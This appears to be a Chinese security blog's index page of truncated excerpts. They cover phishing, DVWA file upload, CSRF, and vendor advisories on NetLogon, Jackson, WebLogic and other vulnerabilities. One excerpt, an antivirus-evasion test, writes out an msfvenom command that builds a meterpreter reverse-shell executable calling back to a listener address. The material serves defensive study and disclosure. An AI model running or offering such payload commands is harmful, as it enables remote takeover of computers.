0x01 Punycode钓鱼攻击 1.1什么是网络钓鱼？ 网络钓鱼（Phishing，与钓鱼的英语fishing发音相近，又名钓鱼法或钓鱼式攻击）是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件，意图引诱收信人给出敏感信息（如用户名、口令、帐号 ID 、 ATM PIN 码或信用卡详细信息）的一种攻击方式。 攻击者利……

File Upload（文件上传）漏洞： 由于对用户上传文件的类型、内容没有进行严格的审查，使得攻击者可以通过上传含有执行脚本的木马文件操纵服务器，因此文件上传漏洞带来的危害常常是毁灭性的。 low级别： <?phpif( isset( $_POST[ ‘Upload’ ] ) ) {// W……

CSRF跨站点请求伪造(Cross—Site Request Forgery)： 跟XSS攻击一样，存在巨大的危害性，你可以这样来理解：攻击者盗用了你的身份，以你的名义发送恶意请求，对服务器来说这个请求是完全合法的，但是却完成了攻击者所期望的一个操作，比如以你的名义发送邮件、发消息，盗取你的账号，添加系统管理员，甚至于购买商品、……

NetLogon 远程协议是一种在 Windows 域控上使用的 RPC 接口,被用于各种与用户和机器认证相关的任务。最常用于让用户使用 NTLM 协议登录服务器，也用于 NTP 响应认证以及更新计算机域密码。 安全狗安全威胁情报中心注意到有国外安全厂商将NetLogon特权提升漏洞（CVE-2020-1472）的详细技术分析和验证脚本公开上传到git……

0x01 环境搭建 测试系统:windows10 (1909) 杀毒软件：360安全卫士 在线杀毒：VT 0x02 payload生成 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 LPORT=7777 -f exe -o t.exe 原始生成后，完全被查杀 VT查杀55/69 0x03 编码处理 这里使用msf自带的编码器进……

近日，安全狗关注到jackson-databind官方发布最新版本，当中修复了一处反序列化远程代码执行漏洞（CVE-2020-24616），漏洞存在于br.com.anteros:Anteros-DBCP库类中，攻击者可以通过精心构造的请求包在受影响的 Jackson 服务器上进行远程代码执行。 安全狗提醒使用jackson-databind的用户及时安排自检并做好安全加固……

2020年8月23日，安全狗应急响应中心监测到宝塔官方发布的安全更新，修复了一处未授权访问的漏洞。 宝塔面板是一款使用方便、功能强大且终身免费的服务器管理软件,支持Linux与Windows系统。近日宝塔面馆官方发布了安全更新，修复了一处高危漏洞。攻击者通过访问特定路径，可以直接访问到phpmyadmin数据库管理界面，并……

近日，Sonatype Security Team官方发布了一则关于Nexus Repository Manager 3.x产品的远程代码执行漏洞通告。 Sonatype Nexus Repository 是一个开源的仓库管理系统，在安装、配置、使用简单的基础上提供了更加丰富的功能。近日Sonatype官方发布安全公告披露了在Nexus Repository Manager 3.x 版本中……

近日，安全狗安全运营中心监测到，WebSphere Application Server被曝存在一处IIOP反序列化漏洞（漏洞编号：CVE-2020-4450），漏洞被利用可导致远程代码执行。 为避免您的业务受影响，安全狗建议您及时开展安全自查，如在受影响范围，请您及时进行更新修复，避免被外部攻击者入侵。 WebSphere Application Server ……

2020年7月14日，安全狗应急响应中心监测到Oracle官方发布安全公告，披露WebLogic服务器存在多个高危漏洞，包括反序列化等。黑客利用漏洞可能可以远程获取WebLogic服务器权限，风险较大。 WebLogic 是美国 Oracle 公司出品的 Java 应用服务器，WebLogic 是用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和……